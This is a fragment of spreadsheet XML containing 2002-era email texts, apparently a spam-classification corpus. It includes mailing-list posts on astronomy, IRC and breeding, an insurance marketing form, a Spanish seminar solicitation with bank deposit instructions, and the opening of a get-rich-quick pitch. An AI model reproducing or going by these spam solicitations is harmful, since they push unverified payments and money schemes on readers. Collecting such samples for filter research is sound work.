                 &lt;tr&gt;=20
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"4" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 color=3D"#000000" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 color=3D"#000000" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 color=3D"#000000" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 color=3D"#000000" size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 color=3D"#000000" size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"40%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;b&gt;&lt;font size=3D"2"&gt;=20
                           &lt;input type=3D"checkbox" name=3D"IsLifeHealth" =
 value=3D"LifeHealth_Yes"&gt;
                           Life/Health Agent&lt;/font&gt;&lt;/b&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"40%"&gt; &lt;b&gt;&lt;font size=3D"2"&gt;=20
                           &lt;input type=3D"checkbox" name=3D"IsPandC" =
 value=3D"PandC_Yes"&gt;
                           Property/Casualty Agent&lt;/font&gt;&lt;/b&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"40%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"rwcorlin@insiq.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Rockwood Form Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
             &lt;/table&gt;
             &lt;/font&gt; &lt;font face=3D"Times New Roman, Times" size=3D"3"&gt;=20
             &lt;p&gt;&lt;b&gt;Visit us on the web at &lt;a =
 href=3D"http://www.rockwoodinsurance.com/" style=3D"color: =
 #000099"&gt;www.rockwoodinsurance.com&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#000000" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1" =
 color=3D"#FFCC00"&gt;We=20
         don't want anyone to receive our mailings who does not wish to =
 receive=20
         them. This is a professional communication sent to insurance =
 professionals.=20
         To be removed from this mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to =
 this message.=20
         Instead, go here: &lt;a href=3D"http://www.insurancemail.net"&gt;&lt;font =
 color=3D"#00CCFF"&gt;http://www.insurancemail.net&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"1" color=3D"#FFFFFF"&gt;Legal Notice =
 &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_281518_01C205B4.F6FEA190--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Astro bits
</t>
  </si>
  <si>
    <t xml:space="preserve">HUBBLE SPOTS AN ICY WORLD FAR BEYOND PLUTO
 ------------------------------------------
 Astronomers have discovered a distant body that appears to be the
 largest object in the Kuiper Belt, a body half the size of Pluto that
 raises new questions about the definition of a planet. The icy world
 2002 LM60 has been dubbed "Quaoar".
     http://spaceflightnow.com/news/n0210/07quaoar/
 ASTRONOMERS SLICE AND DICE GALAXIES
 -----------------------------------
 New views of star birth and the heart of a spiral galaxy have been
 seen by a state-of-the-art astronomical instrument on its first
 night. The new spectrometer has a revolutionary ability to 'slice'
 any object in the sky into sections, producing a three dimensional
 view of the conditions throughout entire galaxies in a single
 observation.
     http://spaceflightnow.com/news/n0210/08galaxies/
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home with Ease!
 http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Fortean Times Online
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Helen &amp; Mike wrote:
 &gt;
 &gt;&gt;  Chat tends to be on irc.quakenet #forteana most nights. I think this was
 &gt;&gt;  done mainly because of troll infestation.  Colin has control most nights on
 &gt;&gt;  there, and he keeps an eye on people and kicks them if they come in under
 &gt;&gt;  assumed names, or as soon as they show their true natures.  Just call him
 &gt;&gt;  Billy Goat Gruff :-)
 &gt;
 &gt;How do you sign up?
 &gt;
 &gt;Thanks!
 &gt;
 &gt;Kelly
 kelly, same thing as when you used to come to frogstone on Dalnet. 
 #frogstone is still there, and also #forteana. If you want to go to 
 quakenet, just change your server (in mIRC if that is what you use) 
 to that.
 -- 
 Fel
 NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [MLB-WIRELESS] CONTRALORIA Y GERENCIA ADMINISTRATIVA
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format
 --=_NextPart_2rfkindysadvnqw3nerasdf
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 http://www.rebackee.com/cursos2/contraloria.htm
 --=_NextPart_2rfkindysadvnqw3nerasdf
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Content-Base: "http://www.rebackee.com/cursos2/"
 Content-Location: "http://www.rebackee.com/cursos2/"
 &lt;html&gt;
 &lt;head&gt;&lt;BASE HREF=3D=22http://www.rebackee.com/cursos2/=22&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Diso-8859-1=22&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D=22=23FFFFFF=22 text=3D=22=23000000=22&gt;
 &lt;div align=3D=22center=22&gt;=20  &lt;p&gt;&lt;font size=3D=224=22&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22 size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;Quality=20    Training de M&amp;eacute;xico&lt;/font&gt;&lt;/b&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;,=20    lo invita al extraordinario seminario que tendr&amp;aacute; lugar en &lt;b&gt;&lt;font color=3D=22=23000099=22&gt;VILLAHERMOSA&lt;/font&gt;&lt;/b&gt;&lt;font color=3D=22=23000099=22&gt;,=20    &lt;b&gt;TABASCO&lt;/b&gt;&lt;/font&gt;, los &lt;font color=3D=22=23990000=22&gt;&lt;b&gt;d&amp;iacute;as 01 y 02 de=20    AGOSTO de 2002&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
   &lt;hr&gt;
   &lt;p&gt;&lt;img src=3D=22../www/imagesjulio/contraloria.jpg=22 width=3D=22551=22 height=3D=22723=22&gt;
   &lt;hr&gt;
   &lt;div align=3D=22left=22&gt;=20    &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;Este es un seminario=20      sobre los m&amp;aacute;s efectivos conceptos y maneras concretas para mejorar=20      la funci&amp;oacute;n de Contralor&amp;iacute;a y Gerencia Administrativa.....&amp;iquest;=20      Que medidas debe tomar.... para enfrentar la Falta de Liquidez, Reducci&amp;oacute;n=20      de Ventas, Aumento en los Costos, conflictos Laborales....&amp;iquest; C&amp;oacute;mo=20      anticiparse a un colapso en la empresa ?. &lt;/font&gt;&lt;/p&gt;
     &lt;p&gt; &lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22&gt;&amp;iexcl;&amp;iexcl;=20      NO ESPERE A QUE SEA DEMASIADO TARDE =21=21&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;Se discutir&amp;aacute;=20      ampliamente sobre la situaci&amp;oacute;n actual de las empresas en &amp;eacute;pocas=20      de crisis, &amp;iquest;que est&amp;aacute;n haciendo para salir adelante?. As&amp;iacute;=20      como estrategias contables actuales, pron&amp;oacute;sticos de presupuestos,=20      modelos ABC y otras alternativas de flujo de informaci&amp;oacute;n; como controles=20      y cumplimientos, informaci&amp;oacute;n administrativa, reportes de gasto, cr&amp;eacute;dito=20      y cobranza, an&amp;aacute;lisis financiero y personal. Aspectos claves dentro=20      del programa :&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23990000=22&gt;&lt;b&gt;-=20      Como organizar su &amp;aacute;rea y hacerla altamente competitiva&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;b&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23990000=22&gt;-=20      Renueve su manera de utilizar los informes financieros&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;p&gt;&lt;b&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23990000=22&gt;-=20      Predictores de Quiebra....Acciones inmediatas a considerar &lt;br&gt;
       &lt;br&gt;
       - Casos Hist&amp;oacute;ricos&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;font face=3D=22Times New Roman, Times, serif=22 size=3D=224=22&gt;&lt;b&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23000099=22&gt;&amp;iexcl;&amp;iexcl;LA=20      IMPORTANCIA DE CAPACITARSE CON LOS L&amp;Iacute;DERES=21=21 &lt;/font&gt;&lt;/b&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23000000=22&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;b&gt;Experiencia, Calidad y &amp;Eacute;xito...&lt;/b&gt;&lt;br&gt;
       &lt;br&gt;
       Quality Training de M&amp;eacute;xico, le ofrece los m&amp;aacute;s aclamados consultores=20      y seminarios ejecutivos disponibles en el mercado...con los temas de mayor=20      impacto en las empresas...&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;SONY de M&amp;eacute;xico,=20      Hewlett Packard, Casa Cuervo, Cervecer&amp;iacute;a Modelo, PEMEX, Mexicana,=20      Molex y m&amp;aacute;s de 4,000 empresas en M&amp;eacute;xico y Latinoam&amp;eacute;rica,=20      conocen nuestros exclusivos programas de capacitaci&amp;oacute;n.&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;font face=3D=22Times New Roman, Times, serif=22 size=3D=224=22&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23000000=22&gt;&lt;br&gt;
       &lt;b&gt;&lt;font color=3D=22=23000099=22&gt;&amp;iexcl; Un experto estar&amp;aacute; con usted en este=20      seminario =21&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;br&gt;
       &lt;/font&gt; &lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
       &lt;font size=3D=225=22 color=3D=22=23000099=22&gt;&lt;b&gt;&lt;font size=3D=224=22 color=3D=22=23990000=22&gt;TEMARIO:&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;font color=3D=22=23990000=22&gt;&lt;b&gt;1.- El Nuevo Papel del Gerente Administrativo en=20      las Empresas Modernas.&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
       - Funciones, responsabilidades y resultados.&lt;br&gt;
       - Trampas en la Planeaci&amp;oacute;n.&lt;br&gt;
       - El Plan de Contingencia.&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22&gt;2.-=20      La Gerencia Administrativa y el An&amp;aacute;lisis de Procesos, Pol&amp;iacute;ticas=20      y Procedimientos para controlar las operaciones de su empresa.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       - Conocimiento de la empresa: Base para el an&amp;aacute;lisis de procesos.&lt;br&gt;
       - Establecimiento de planes de operaci&amp;oacuten.&lt;/font&gt; &lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;- An&amp;aacute;lisis de=20      funciones b&amp;aacute;sicas: abastecimientos, producci&amp;oacute;n, ventas, recursos=20      humanos.&lt;br&gt;
       - Bases para implementar pol&amp;iacute;ticas y procedimientos.&lt;/font&gt; &lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22&gt;3.-=20      Control y Administraci&amp;oacute;n de Ingresos, el Cr&amp;eacute;dito y la Cobranza.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       - Organizaci&amp;oacute;n del departamento de cr&amp;eacute;dito y su manual de=20      pol&amp;iacute;ticas y procedimientos.&lt;br&gt;
       - Determinaci&amp;oacute;n de pol&amp;iacute;ticas de apertura y autorizaci&amp;oacute;n=20      de cr&amp;eacute;dito.&lt;br&gt;
       - Gesti&amp;oacute;n de Cobranza.&lt;br&gt;
       - Concentraci&amp;oacute;n de fondos, cobranza electr&amp;oacute;nica y factoraje.&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22&gt;4.-=20      Control de Costos en la Empresa.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       - Los costos en la administraci&amp;oacute;n empresarial.&lt;br&gt;
       - Reducci&amp;oacute;n de Costos - Alcances -&lt;br&gt;
       - Presupuestos de costos.&lt;br&gt;
       - Control de rentabilidad y costos.&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22&gt;5.-=20      Renueve su Manera de Utilizar Informes Financieros.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       - Problemas en la manera de elaborar informes financieros.&lt;br&gt;
       - Tipos, usos y elementos en los informes.&lt;br&gt;
       - Criterios para los informes: importancia, relevancia, prontitud y presentaci&amp;oacute;n.=20      &lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22&gt;6.-=20      Reportes Financieros para Evaluar la Productividad:&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       - Herramientas de Diagn&amp;oacute;stico del resultado financiero.&lt;br&gt;
       - Valor Econ&amp;oacute;mico Agregado (EVA) como herramienta para medir la productividad.&lt;br&gt;
       - Enlace entre la estrategia global de la empresa y la informaci&amp;oacute;n=20      financiera y administrativa.&lt;br&gt;
       - Informaci&amp;oacute;n para medir y mejorar la competitividad: Ventajas y=20      desventajas competitivas.&lt;br&gt;
       - Concepto de los GAP&amp;=23146;S.&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22&gt;-------------------------------------------------------------------------------------------------------------------------------------------------&lt;br&gt;
       &lt;br&gt;
       &lt;font color=3D=22=23990000=22&gt;&lt;b&gt;&lt;font size=3D=224=22&gt;PROGRAMA:&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       &lt;font size=3D=224=22&gt;&lt;b&gt;01 y 02 de AGOSTO de 2002&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;br&gt;
       horario: 08:00 a 13:00 y de 14:30 a 17:30 hrs.&lt;br&gt;
       &lt;br&gt;
       &lt;font color=3D=22=23003399=22 size=3D=224=22&gt;&lt;b&gt;INCLUYE:&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
       &lt;font color=3D=22=23000099=22&gt;Informaci&amp;oacute;n estrat&amp;eacute;gica, material de=20      trabajo, reconocimiento con valor oficial, coffee break y la exposici&amp;oacute;n=20      de un prestigiado consultor.&lt;/font&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;font color=3D=22=23990000=22 size=3D=224=22&gt;&lt;b&gt;FORMA DE INSCRIPCI&amp;Oacute;N:&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
       1.- Llenar debidamente la solicitud de inscripci&amp;oacute;n.&lt;br&gt;
       &lt;br&gt;
       2.- Cheque a nombre de: &lt;b&gt;Quality Training Corporation, S.C.&lt;/b&gt;&lt;br&gt;
       &lt;br&gt;
       3.- Dep&amp;oacute;sito en &lt;b&gt;Banamex Cuenta : 6680083 Sucursal 082&lt;/b&gt; Centro=20      Financiero Paseo &lt;br&gt;
       &lt;br&gt;
       4.- Enviar por fax la ficha de su dep&amp;oacute;sito sellada.&lt;br&gt;
       &lt;br&gt;
       5.- Debido al cupo limitado, &amp;uacute;nicamente se garantizar&amp;aacute;n las=20      inscripciones en el orden en que efectuaron su pago.&lt;/font&gt;&lt;/p&gt;
     &lt;/div&gt;
   &lt;div align=3D=22left=22&gt;
     &lt;p&gt;&lt;b&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23003399=22 size=3D=224=22&gt;INVERSI&amp;Oacute;N:=20      =24 4,690 &lt;/font&gt;&lt;/b&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23003399=22 size=3D=223=22&gt;mas=20      IVA&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=223=22 color=3D=22=23003399=22&gt;&lt;b&gt;&lt;font size=3D=224=22&gt;PRONTO=20      PAGO: =24 4,200&lt;/font&gt;&lt;/b&gt; mas IVA&lt;/font&gt; &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=223=22 color=3D=22=23990000=22&gt;(antes=20      del 25 de julio de 2002)&lt;/font&gt; &lt;/p&gt;
     &lt;p&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=223=22 color=3D=22=23003399=22&gt;&lt;b&gt;&lt;font color=3D=22=23000000=22&gt;INFORMES=20      E INSCRIPCIONES: &lt;font size=3D=225=22&gt;(993) 314 - 40 85&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;font color=3D=22=23000000=22&gt;=20      con 10 l&amp;iacute;neas&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;&lt;hr&gt;
     &lt;p align=3D=22center=22&gt;&lt;img src=3D=22../www/imagesjulio/boton%20de%20solicitud%20de%20inscripcion.jpg=22 width=3D=22335=22 height=3D=2296=22 usemap=3D=22=23Map=22 border=3D=220=22&gt;=20      &lt;map name=3D=22Map=22&gt;
         &lt;area shape=3D=22rect=22 coords=3D=223,3,329,93=22 href=3D=22villahermosasol1.htm=22&gt;
       &lt;/map&gt;
     &lt;/p&gt;
     &lt;hr&gt;
     &lt;p&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22&gt; Si Usted no desea recibir mas=20      e-mails sobre nuestros exclusivos programas de capacitaci&amp;oacute;n o prefiere=20      que lo enteremos por otro medio favor de hacernos llegar sus comentarios=20      a: &lt;a href=3D=22mailto:villahermosa_bajas=40rebackee.com=22&gt;villahermosa_bajas=40rebackee.com&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22&gt;If you don't want to receive=20      our information, write us an electronic mail indicating it to: &lt;/font&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;a href=3D=22mailto:villahermosa_bajas=40rebackee.com=22&gt;villahermosa_bajas=40rebackee.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
     &lt;/p&gt;
     &lt;p&gt;&amp;nbsp;&lt;/p&gt;
     &lt;p&gt;&lt;b&gt;&lt;font color=3D=22=23990000=22 size=3D=224=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&amp;iexcl;&amp;iexcl;&amp;iexcl;=20      Solicite Mayor informaci&amp;oacute;n de Nuestros Exclusivos Programas =21=21=21&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=224=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23000000=22&gt;&lt;b&gt;Quality=20      Training de M&amp;eacute;xico&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;p&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;DIRECCI&amp;Oacute;N DE=20      PROYECTOS VILLAHERMOSA&lt;br&gt;
       Conmutador 01 993 914 - 40 85 con 10 l&amp;iacute;neas&lt;/font&gt;&lt;font size=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
       &lt;a href=3D=22mailto:villahermosa=40rebackee.com=22&gt;villahermosa=40rebackee.com&lt;/a&gt;&lt;br&gt;
       &lt;font color=3D=22=23990000=22&gt;&lt;a href=3D=22http://www.rebackee.com=22&gt;www.rebackee.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
       &lt;/font&gt;&lt;font face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
       &lt;/font&gt; &lt;/p&gt;
     &lt;/div&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --=_NextPart_2rfkindysadvnqw3nerasdf--
 To unsubscribe: send mail to majordomo@wireless.org.au
 with "unsubscribe melbwireless" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; Unless your parents were selectively bred like livestock to produce you, 
 &gt; &gt; I don't think you can make that case...  :-)
 &gt;
 &gt; I'm saying that my parents selected each other, and that they did so
 &gt; because (among other reasons) each wanted the other's genes to be
 &gt; mixed with their own in the offspring that they were planning.
 &gt;
 &gt; What does it matter that they were selecting to produce their own
 &gt; offspring, rather than the offspring of two unrelated animals?
 That doesn't matter.  What does matter
 is that they were going on phenotypes,
 and didn't engineer the genetics.  That
 example makes a good case for natural
 selection, but not for artificial.
 (do "married people live longer" because
 of the benefits of matrimony, or because
 acceptable health is one of the qualities
 selected for in spouses?)
 Of course, if there are FoRKs with six
 or fewer biological great grandparents
 (or who are offspring of Wilt) I should
 eat my words; otherwise, the micro/macro
 distinction seems much more relevant.
 -Dave
 &gt; I guess that the reason that I disagree is that some groups arguing
 &gt; against any checks on genetic engineering use that same argument -
 &gt; "we've been doing it since prehistory, so we don't need to apply any
 &gt; caution today".
 One can also view that argument as a case
 for checks: livestock owners have, over a
 period of millenia, altered the genetics
 of their herds to be dumber, meatier, and
 more tolerant of industrial living, so if
 caution is in order, they are some of the
 least likely people to volunteer it.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [IIU] Recommendations on phone / pda+phone + European GPRS coverage info.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I believe you get more value for money by separating the mobile phone from 
 the PDA.
 As expressed by power users on Open, a combination like a EUR 160 Nokia 
 6310i talking to a EUR 440 Palm m515 will meet your specification. By using 
 a EUR 90 Bluetooth SD chip, the Palm and the Nokia 6310i can talk to one 
 another even when not in line of sight.
 regards
 Bernie
 www.topgold.com/blog/
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Easy to make from $200,000 every 7 months
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=(0199)http://64.4.22.250/cgi-bin/getmsg?curmbox=F000000001&amp;a=ff4bcc6372ee5e1b398defa168faf49d&amp;msg=MSG1023911025.63&amp;start=2053843&amp;len=381107&amp;mimepart=6&amp;disk=64.4.22.67_d581&amp;login=brianho3&amp;domain=hotmail.com --&gt;
 &lt;HTML xmlns="http://www.w3.org/TR/REC-html40" xmlns:o = 
 "urn:schemas-microsoft-com:office:office" xmlns:w = 
 "urn:schemas-microsoft-com:office:word"&gt;&lt;HEAD&gt;&lt;TITLE&gt;Easy to make "Between $200,000 and $500,000 every seven months&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content=FrontPage.Editor.Document name=ProgId&gt;
 &lt;META content="Microsoft FrontPage 4.0" name=GENERATOR&gt;
 &lt;META content="Microsoft Word 9" name=Originator&gt;&lt;LINK 
 href="./Online%20Report%20Mailing_files/filelist.xml" rel=File-List&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:DocumentProperties&gt;
   &lt;o:Author&gt;Fred Lhenen&lt;/o:Author&gt;
   &lt;o:LastAuthor&gt;Fred Lhenen&lt;/o:LastAuthor&gt;
   &lt;o:Revision&gt;2&lt;/o:Revision&gt;
   &lt;o:TotalTime&gt;63&lt;/o:TotalTime&gt;
   &lt;o:LastPrinted&gt;2001-11-14T17:38:00Z&lt;/o:LastPrinted&gt;
   &lt;o:Created&gt;2002-06-12T19:11:00Z&lt;/o:Created&gt;
   &lt;o:LastSaved&gt;2002-06-12T19:11:00Z&lt;/o:LastSaved&gt;
   &lt;o:Pages&gt;7&lt;/o:Pages&gt;
   &lt;o:Words&gt;2116&lt;/o:Words&gt;
   &lt;o:Characters&gt;12063&lt;/o:Characters&gt;
   &lt;o:Lines&gt;100&lt;/o:Lines&gt;
   &lt;o:Paragraphs&gt;24&lt;/o:Paragraphs&gt;
